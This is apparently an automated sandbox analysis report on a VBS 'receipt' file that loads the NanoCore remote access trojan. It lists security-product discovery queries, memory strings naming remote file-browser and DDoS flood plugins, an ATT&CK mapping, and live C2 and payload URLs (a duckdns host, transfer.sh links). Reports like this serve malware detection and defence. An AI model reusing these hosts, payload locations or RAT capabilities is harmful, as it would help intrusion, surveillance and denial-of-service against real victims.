Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

barindex

Remote Access Functionality:

barindex
Detected Nanocore RatShow sources
Source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder1Process Injection211Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter11Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Disable or Modify Tools1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting221Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection211NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting221LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery12Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
newjan.duckdns.org10%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
newjan.duckdns.org
194.147.140.20
truetrueunknown
transfer.sh
144.76.136.153
truefalse
    high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://transfer.sh/yBhJOe/bbhyu.txtfalse
      high
      https://transfer.sh/PeIb5p/ffrtg.txtfalse
        high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://transfer.shpowershell.exe, 00000003.00000002.406014294.000002691A27A000.00000004.00000001.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.406014294.000002691A27A000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          unknown
          http://google.comaspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmpfalse
            high
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.406940294.000002691A401000.00000004.00000001.sdmpfalse
              high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.405467045.0000026919FC1000.00000004.00000001.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.406014294.000002691A27A000.00000004.00000001.sdmpfalse
                  high
                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.406014294.000002691A27A000.00000004.00000001.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.406940294.000002691A401000.00000004.00000001.sdmpfalse
                      high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      144.76.136.153
                      transfer.shGermany
                      24940HETZNER-ASDEfalse
                      194.147.140.20
                      newjan.duckdns.orgunknown
                      47285PTPEUtrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:483191
                      Start date:14.09.2021
                      Start time:16:16:10
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 16s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:16 Items receipt.vbs
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:34
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winVBS@6/10@26/3
                      EGA Information:Failed
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .vbs
                      • Override analysis time to 240s for JS/VBS files not yet terminated
                      Warnings:
                      Show All
                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.168.117.173, 52.182.143.212, 13.89.179.12, 104.208.16.94, 20.189.173.22, 23.211.4.86, 20.82.209.183, 173.222.108.226, 173.222.108.210, 40.112.88.60, 20.50.102.62, 80.67.82.211, 80.67.82.235, 20.54.110.249
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, onedsblobprdcus17.centralus.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:17:21API Interceptor25x Sleep call for process: powershell.exe modified
                      16:18:25API Interceptor1481x Sleep call for process: aspnet_compiler.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      144.76.136.153Receipt_12203.vbsGet hashmaliciousBrowse
                      • transfer.sh/get/E2oQCW/Server.txt
                      Invoice #60122.vbsGet hashmaliciousBrowse
                      • transfer.sh/get/Vp6k0P/Server.txt
                      M00GS82.vbsGet hashmaliciousBrowse
                      • transfer.sh/get/QipjYs/fOOFFK.txt
                      #P0082.vbsGet hashmaliciousBrowse
                      • transfer.sh/get/4YgL52/HJN.txt
                      Invoice #33190.vbsGet hashmaliciousBrowse
                      • transfer.sh/get/1jDQCmj/trivago.txt
                      ZHDJFEB83MK.vbsGet hashmaliciousBrowse
                      • transfer.sh/15cCRXY/KFKFKF.txt
                      #W002.vbsGet hashmaliciousBrowse
                      • transfer.sh/1YKpmfw/HmS.txt
                      WOO62_InvoiceCopy.vbsGet hashmaliciousBrowse
                      • transfer.sh/p/SHJA.txt
                      A719830-Paid-Receipt.vbsGet hashmaliciousBrowse
                      • transfer.sh/b/deef.txt
                      S0187365-Paid-Receipt.vbsGet hashmaliciousBrowse
                      • transfer.sh/1w231Gc/eeff.txt
                      X92867354_PAYMENT_RECEIPT.vbsGet hashmaliciousBrowse
                      • transfer.sh/1cKLmWw/defff.txt
                      H6289_Payment_Invoice_.vbsGet hashmaliciousBrowse
                      • transfer.sh/bypass.txt
                      W00903InvoicePayment.vbsGet hashmaliciousBrowse
                      • transfer.sh/1Qh4UR2/defender.txt
                      R73981_Payment_Invoice_.vbsGet hashmaliciousBrowse
                      • transfer.sh/1yD4k6Q/ftf.txt
                      S83735478_Payment_Invoice.vbsGet hashmaliciousBrowse
                      • transfer.sh/1WFWzN7/defender.txt
                      D37186235_Payment_Invoice.vbsGet hashmaliciousBrowse
                      • transfer.sh/1RzUlWk/defender.txt
                      In_WO072.vbsGet hashmaliciousBrowse
                      • transfer.sh/1RKyZ9I/hjdds.txt
                      FDOCX3429067800.vbsGet hashmaliciousBrowse
                      • transfer.sh/1AeAeyx/defender.txt
                      W092.vbsGet hashmaliciousBrowse
                      • transfer.sh/1DiufNP/JKS.txt
                      Texas Windstorm Insurance upgrade package.vbsGet hashmaliciousBrowse
                      • transfer.sh/get/1R86ggs/defender.txt

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      newjan.duckdns.org41-Items-invoice.vbsGet hashmaliciousBrowse
                      • 194.147.140.20
                      8 Items invoice.vbsGet hashmaliciousBrowse
                      • 194.147.140.20
                      3G1J49A6V_Invoice.vbsGet hashmaliciousBrowse
                      • 185.244.30.23
                      LxYbtlP5nB.exeGet hashmaliciousBrowse
                      • 185.244.30.23
                      Invoice#282730.exeGet hashmaliciousBrowse
                      • 79.134.225.9
                      Urban Receipt.exeGet hashmaliciousBrowse
                      • 79.134.225.9
                      d9hGzIR8mh.exeGet hashmaliciousBrowse
                      • 194.5.97.75
                      6554353_Payment_Invoice.exeGet hashmaliciousBrowse
                      • 194.5.97.75
                      transfer.sh41-Items-invoice.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      12-items-receipt.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      8 Items invoice.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Receipt_12203.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Payment_Advoce.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Payment_Advoce.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Invoice #60122.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      83736354Invoicereceipt.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Invoice52190.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      M00GS82.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Invoice#52190.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Payment_Advoce.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      8373543_Invoice_Receipt.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      A6D8N25S_Invoice_receipt.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Invoice#1096.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Receipt.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      #P0082.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Services Needed.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Remittance-20210830.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      LIST.vbsGet hashmaliciousBrowse
                      • 144.76.136.153

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      HETZNER-ASDEdiagram-129.docGet hashmaliciousBrowse
                      • 136.243.74.161
                      diagram-129.docGet hashmaliciousBrowse
                      • 136.243.74.161
                      i3UmAT06iE.exeGet hashmaliciousBrowse
                      • 195.201.225.248
                      cd.exeGet hashmaliciousBrowse
                      • 168.119.139.96
                      diagram-129.docGet hashmaliciousBrowse
                      • 136.243.74.161
                      GCw589FSm7.exeGet hashmaliciousBrowse
                      • 195.201.225.248
                      jFQ6SEAt26Get hashmaliciousBrowse
